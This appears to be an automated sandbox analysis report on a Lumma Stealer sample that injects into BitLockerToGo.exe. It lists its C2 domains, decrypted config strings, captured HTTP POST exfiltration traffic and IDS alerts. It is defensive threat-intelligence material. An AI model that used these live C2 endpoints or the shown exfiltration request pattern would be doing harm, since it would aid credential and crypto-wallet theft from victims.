Edit tour

Windows Analysis Report
External2.4.exe

Overview

General Information

Sample name:	External2.4.exe
Analysis ID:	1581520
MD5:	97766c06578a790ff8f28baf21f70695
SHA1:	8668c33f6287e3e3898c4e3d4f2466595efa1644
SHA256:	6ab343da7ca47e43e789eb528dde342ecb8a86b914943adf5a4a7958248749e6
Tags:	AdwareDigitalPulseexeLummaStealeruser-ventoy
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

External2.4.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\External2.4.exe" MD5: 97766C06578A790FF8F28BAF21F70695)

BitLockerToGo.exe (PID: 7120 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rapeflowwj.lat", "necklacebudi.lat", "crosshuaht.lat", "energyaffai.lat", "icyidentifysu.click", "discokeyus.lat", "aspecteirs.lat", "sustainskelet.lat", "grannyejh.lat"], "Build id": "LPnhqo--bktgtpqvsoua"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000003.2079108699.00000000031A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1960437943.000000000B508000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
Process Memory Space: BitLockerToGo.exe PID: 7120	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 7120	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 7120	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:58:30.970877+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.29.252	443	TCP
2024-12-27T23:58:33.073651+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.29.252	443	TCP
2024-12-27T23:58:35.521088+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.29.252	443	TCP
2024-12-27T23:58:38.001002+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.29.252	443	TCP
2024-12-27T23:58:40.206896+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.29.252	443	TCP
2024-12-27T23:58:42.907688+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.29.252	443	TCP
2024-12-27T23:58:45.419662+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.29.252	443	TCP
2024-12-27T23:58:49.347650+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.29.252	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:58:31.719182+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	104.21.29.252	443	TCP
2024-12-27T23:58:33.855939+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.29.252	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:58:31.719182+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49736	104.21.29.252	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:58:33.855939+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49737	104.21.29.252	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:58:38.767654+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49739	104.21.29.252	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:58:45.443933+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49742	104.21.29.252	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://icyidentifysu.click/apiN	Avira URL Cloud: Label: malware
Source: icyidentifysu.click	Avira URL Cloud: Label: malware
Source: https://icyidentifysu.click/bui	Avira URL Cloud: Label: malware
Source: https://icyidentifysu.click/api	Avira URL Cloud: Label: malware
Source: https://icyidentifysu.click/pi	Avira URL Cloud: Label: malware
Source: https://icyidentifysu.click/	Avira URL Cloud: Label: malware
Source: https://icyidentifysu.click:443/api	Avira URL Cloud: Label: malware
Source: https://icyidentifysu.click/bu	Avira URL Cloud: Label: malware
Source: https://icyidentifysu.click/apigy	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.3.External2.4.exe.b35e000.1.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "necklacebudi.lat", "crosshuaht.lat", "energyaffai.lat", "icyidentifysu.click", "discokeyus.lat", "aspecteirs.lat", "sustainskelet.lat", "grannyejh.lat"], "Build id": "LPnhqo--bktgtpqvsoua"}

Multi AV Scanner detection for submitted file

Source: External2.4.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: icyidentifysu.click
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: LPnhqo--bktgtpqvsoua

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_00415211 CryptUnprotectData,

4_2_00415211

Source: External2.4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49742 version: TLS 1.2

Source: External2.4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: External2.4.exe, 00000000.00000002.1960437943.000000000B4CE000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: External2.4.exe, 00000000.00000002.1960437943.000000000B4CE000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh	4_2_004259F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [eax+ebx+09h], 00000000h	4_2_00436980
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [ebp-10h], ebx	4_2_0040A283
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], cx	4_2_004183F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	4_2_0043D580
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 71B3F069h	4_2_0043D580
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	4_2_0040CE98
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [00442B14h]	4_2_0040CE98
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 2DA07A80h	4_2_0043D7B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A2347758h	4_2_0043A030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-2Ch]	4_2_00427E16
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], C7235EAFh	4_2_0043D8E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+04255C89h]	4_2_00409080
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp+08h]	4_2_00422966
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	4_2_0040C93E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0040C93E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add eax, ecx	4_2_0042D1C4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, eax	4_2_004059D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebp, eax	4_2_004059D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [esi], dl	4_2_0042C199
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	4_2_0042A270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	4_2_00415A0E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	4_2_00427223
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp+08h]	4_2_00422966
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx eax, byte ptr [edi]	4_2_0043C2EE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	4_2_004192F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ecx	4_2_00425287
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-56522565h]	4_2_004222B1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	4_2_0041AB1A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edi+18h]	4_2_00439BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-5F965E5Fh]	4_2_00417BFA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-6FEB5746h]	4_2_00417BFA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, word ptr [ebp+00h]	4_2_00437BA9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch]	4_2_0041FC50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	4_2_0041FC50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ebx+edx], 00000000h	4_2_0041D400
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	4_2_00437420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 5E874B5Fh	4_2_00437420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edx+ebx*8], BC9C9AFCh	4_2_00437420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then test eax, eax	4_2_00437420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	4_2_004214C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ebp+00h]	4_2_004094D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_00429CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-56522565h]	4_2_00421CAB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp dword ptr [00443ECCh]	4_2_00421CAB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	4_2_00407550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	4_2_00407550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, edi	4_2_0041655D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp dword ptr [00443684h]	4_2_0041655D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh	4_2_0041655D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1B9D9E48h]	4_2_0041ADE9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ecx], dx	4_2_0040DDFA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ebp+00h]	4_2_00409582
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	4_2_00426D93
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_00425E40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-09D3FE44h]	4_2_00425E40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebp, edi	4_2_00425E40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, ecx	4_2_00424E40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_00416E70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-2Ch]	4_2_00427E16
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-000000CFh]	4_2_0040AE20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx]	4_2_0040AE20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_0042B6E1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_0042B738
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	4_2_004277A1

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49742 -> 104.21.29.252:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: icyidentifysu.click
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: grannyejh.lat

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.29.252:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.29.252:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: icyidentifysu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: icyidentifysu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TVXMSYXTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18110Host: icyidentifysu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6OILA88KW08UIHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8767Host: icyidentifysu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7ZCLH0SUATFAO0OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20426Host: icyidentifysu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RAM8QHLHYLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1211Host: icyidentifysu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YHCRQUUJGDYFTVAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 565081Host: icyidentifysu.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: icyidentifysu.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: icyidentifysu.click

Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000004.00000003.2157105776.000000000317D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100893821.0000000003144000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2118301133.0000000003145000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2079128879.0000000003144000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2079536389.0000000003145000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2117608539.0000000003145000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2156907192.0000000003145000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100761942.0000000003132000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2152446703.0000000003145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
